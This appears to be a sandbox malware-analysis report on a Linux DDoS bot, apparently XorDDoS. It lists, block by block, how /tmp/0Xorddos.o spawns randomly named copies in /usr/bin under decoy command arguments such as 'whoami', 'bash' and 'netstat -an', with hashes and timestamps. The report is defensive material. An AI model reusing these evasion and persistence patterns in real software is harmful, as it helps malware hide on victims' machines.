                                                                                                                                                Arguments:/usr/bin/qizbpqmtbi uptime 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:/usr/bin/qizbpqmtbi "cat resolv.conf" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:/usr/bin/qizbpqmtbi ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:/usr/bin/qizbpqmtbi "ls -la" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:/usr/bin/qizbpqmtbi "cat resolv.conf" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:a1b79114b59e6fc4cb28e756f2425224

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:/usr/bin/cvvhpkxdyk su 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:/usr/bin/cvvhpkxdyk whoami 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:/usr/bin/cvvhpkxdyk bash 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:/usr/bin/cvvhpkxdyk id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:48
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:48
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:48
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:/usr/bin/cvvhpkxdyk ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:48
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvvhpkxdyk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:de6e16b421b0aeff8b86522f8c8a2ef7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:/usr/bin/oscovqjuil "netstat -an" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:/usr/bin/oscovqjuil ls 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:/usr/bin/oscovqjuil whoami 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:/usr/bin/oscovqjuil gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:/usr/bin/oscovqjuil "echo \"find\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:54
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/oscovqjuil
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:9c0655b6b1c4ddae6f4f1c2598424c40

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:/usr/bin/cxictzyxcu "echo \"find\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:/usr/bin/cxictzyxcu ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:/usr/bin/cxictzyxcu "netstat -an" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:/usr/bin/cxictzyxcu ls 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:/usr/bin/cxictzyxcu bash 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cxictzyxcu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2930abf3b376ed3414bd8a59a8f8e1bf

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:/usr/bin/qfvvwlqqkq "ps -ef" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:/usr/bin/qfvvwlqqkq "grep \"A\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:23:05
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qfvvwlqqkq
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:0e70bb0814ee7b2c7ad5cf64f29d5619

